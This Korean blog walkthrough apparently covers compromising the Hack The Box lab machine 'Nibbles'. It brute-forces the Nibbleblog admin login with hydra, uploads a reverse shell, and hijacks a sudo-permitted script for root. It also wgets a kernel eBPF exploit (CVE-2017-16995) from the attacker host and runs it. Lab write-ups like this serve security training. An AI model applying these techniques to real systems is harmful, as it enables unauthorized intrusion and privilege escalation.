/nibbleblog
1. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
┌──(root💀takudaddy)-[/htb]
└─# gobuster dir -f -t 50 -x html,txt,php -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,php
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/04/19 17:49:53 Starting gobuster in directory enumeration mode
===============================================================
/admin/ (Status: 200) [Size: 2127]
/admin.php (Status: 200) [Size: 1401]
/content/ (Status: 200) [Size: 1353]
/install.php (Status: 200) [Size: 78]
/index.php (Status: 200) [Size: 2986]
/sitemap.php (Status: 200) [Size: 401]
/update.php (Status: 200) [Size: 1622]
===============================================================
2021/04/19 17:50:13 Finished
nibbleblog 4.0.3
┌──(root💀takudaddy)-[~]
└─# searchsploit nibbleblog
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metaspl | php/remote/38489.rb
-------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[~]
└─# cd /htb/n
┌──(root💀takudaddy)-[/htb/n]
└─# searchsploit -m php/remote/38489.rb
Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)
URL: https://www.exploit-db.com/exploits/38489
Path: /usr/share/exploitdb/exploits/php/remote/38489.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /htb/n/38489.rb
sqlmap = 안됨
diego najar
이미지 업로드 가능? 불가능
username = admin
hydra :
우선 cewl로 페이지 내 단어들을 비밀번호 리스트로 만든다.
┌──(root💀takudaddy)-[~]
└─# cewl -m 5 http://10.10.10.75/nibbles > pass.list
┌──(root💀takudaddy)-[/htb/n]
└─# cat pass.list 2 ⚙
Found
requested
nibbles
found
server
Apache
Ubuntu
Server
┌──(root💀takudaddy)-[/htb/n]
└─# hydra -l admin -P pass.list 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^,password=^PASS^:Incorrect username" -t 3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 20:58:08
[DATA] max 3 tasks per 1 server, overall 3 tasks, 8 login tries (l:1/p:8), ~3 tries per task
[DATA] attacking http-post-form://10.10.10.75:80/nibbleblog/admin.php:username=^USER^,password=^PASS^:Incorrect username
[80][http-post-form] host: 10.10.10.75 login: admin password: nibbles
[80][http-post-form] host: 10.10.10.75 login: admin password: Found
[80][http-post-form] host: 10.10.10.75 login: admin password: requested
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 20:58:09
비번 5회 이상 틀리면
페이지 5분정도 잠김
admin : nibbles
2. EXPLOITATION
nibbleblog 4.0.3 업로드 취약점 공략법
https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/
my image에 들어가서
리버스쉘 올리고
경로로 가보면 올라와 있음.
리스너 기동 후 해당 파일 클릭하면
┌──(root💀takudaddy)-[~]
└─# nc -lvnp 7979
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.75] 53278
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
08:19:12 up 58 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id ; hostname ; ifconfig ; date
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
Nibbles
ens192 Link encap:Ethernet HWaddr 00:50:56:b9:5e:5f
inet addr:10.10.10.75 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:5e5f/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:5e5f/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:16878 errors:0 dropped:0 overruns:0 frame:0
TX packets:15661 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2244971 (2.2 MB) TX bytes:2846348 (2.8 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:200 errors:0 dropped:0 overruns:0 frame:0
TX packets:200 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:15800 (15.8 KB) TX bytes:15800 (15.8 KB)
Mon Apr 19 08:19:37 EDT 2021
$
침투 성공
3. POST EXPLOITATION
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 2: python: not found
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/$
nibbler@Nibbles:/$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$ cd /home
cd /home
nibbler@Nibbles:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 10 2017 .
drwxr-xr-x 23 root root 4096 Dec 15 05:13 ..
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 nibbler
nibbler@Nibbles:/home$ cd nibbler
cd nibbler
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
91f39f173c2a12ca09947b7d9a51edac
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ ls
ls
personal personal.zip user.txt
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls -al
ls -al
total 12
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 4 nibbler nibbler 4096 Apr 19 08:21 ..
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al
ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
4. PRIVILEGE ESCALATION
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "bash" > monitor.sh
echo "bash" > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff#
root@Nibbles:/home/nibbler/personal/stuff# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:/home/nibbler/personal/stuff# cd /root
cd /root
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# cat root.txt
cat root.txt
49c81b66d5aa765f149e175a3eff4995
root@Nibbles:~#
위에서 personal.zip 파일을 unzip해 사용했는데
디렉터리와 파일을 생성해서 진행해도 무방.
nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff/
mkdir -p personal/stuff/
nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "bash" > monitor.sh
echo "bash" > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al
ls -al
total 12
drwxrwxrwx 2 nibbler nibbler 4096 Apr 19 08:50 .
drwxrwxrwx 3 nibbler nibbler 4096 Apr 19 08:49 ..
-rw-rw-rw- 1 nibbler nibbler 5 Apr 19 08:50 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x *.sh
chmod +x *.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# id ; whoami ; hostname
id ; whoami ; hostname
uid=0(root) gid=0(root) groups=0(root)
root
Nibbles
간단한 방법
nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.13/LES.sh
wget http://10.10.14.13/LES.sh
--2021-04-19 08:25:59-- http://10.10.14.13/LES.sh
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87559 (86K) [text/x-sh]
Saving to: 'LES.sh'
LES.sh 100%[===================>] 85.51K 209KB/s in 0.4s
2021-04-19 08:25:59 (209 KB/s) - 'LES.sh' saved [87559/87559]
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
LES.sh monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x *.sh
chmod +x *.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$
nibbler@Nibbles:/home/nibbler/personal/stuff$ ./LES.sh
./LES.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
76 kernel space exploits
48 user space exploits
Possible Exploits:
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
..........
nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-19 08:26:59-- http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'
45010 100%[===================>] 21.74K 108KB/s in 0.2s
2021-04-19 08:27:00 (108 KB/s) - '45010' saved [22264/22264]
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x 54010
chmod +x 54010
chmod: cannot access '54010': No such file or directory
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x 45010
chmod +x 45010
nibbler@Nibbles:/home/nibbler/personal/stuff$ ./45010
./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880033bf0900
[*] Leaking sock struct from ffff88003259a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039fc6d80
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880039fc6d80
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),1001(nibbler)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
49c81b66d5aa765f149e175a3eff4995
#
끝
728x90
반응형
'OSCP > HacktheBox' 카테고리의 다른 글
| 8. Beep (0) | 2021.04.20 |
|---|---|
| 7. Valentine (0) | 2021.04.20 |
| 5. Bashed (0) | 2021.04.19 |
| 4. Shocker (0) | 2021.04.19 |
| 3. Popcorn (0) | 2021.04.18 |